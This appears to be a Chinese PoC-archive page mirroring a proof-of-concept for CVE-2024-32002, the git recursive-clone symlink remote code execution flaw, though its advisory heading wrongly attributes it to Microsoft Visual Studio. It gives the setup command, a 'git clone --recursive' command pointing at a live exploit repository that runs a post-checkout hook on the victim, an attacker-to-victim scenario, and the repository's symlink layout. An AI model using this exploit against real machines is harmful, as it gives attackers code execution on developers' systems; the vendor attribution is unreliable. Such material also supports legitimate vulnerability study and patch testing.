POC详情: c4cb6e7d61c67180d8f27d1175714d17d19f8bc1

来源
https://github.com/EQSTLab/git_rce
关联漏洞
标题: Microsoft Visual Studio 安全漏洞 (CVE-2024-32002)
描述:Microsoft Visual Studio是美国微软(Microsoft)公司的一款开发工具套件系列产品,也是一个基本完整的开发工具集,它包括了整个软件生命周期中所需要的大部分工具。 Microsoft Visual Studio存在安全漏洞的相关信息,请随时关注CNNVD或厂商公告。
描述
git clone rce CVE-2024-32002
介绍
# CVE-2024-32002 PoC
1. You must set up the git's symbolic link option like:
```
git config --global core.symlinks true
```

2. Then exploit CVE-2024-32002 by the following command:
```
git clone --recursive https://github.com/EQSTSeminar/git_rce.git
```

# Attack Scenario
kali(192.168.216.129) --Give remote repository address--> Win(192.168.216.130)

kali(192.168.216.129) <--Git clone && hook script(post-checkout) execution-- Win(192.168.216.130)

# Disclaimer
This repository is not intended to be git clone RCE exploit to CVE-2024-32002. The purpose of this project is to help people learn about this vulnerability, and perhaps test their own applications.
文件快照

 [4.0K]  /data/pocs/c4cb6e7d61c67180d8f27d1175714d17d19f8bc1
├── [   4]  a -> .git
├── [4.0K]  A
│   └── [4.0K]  modules
│       └── [4.0K]  x
└── [ 664]  README.md

4 directories, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。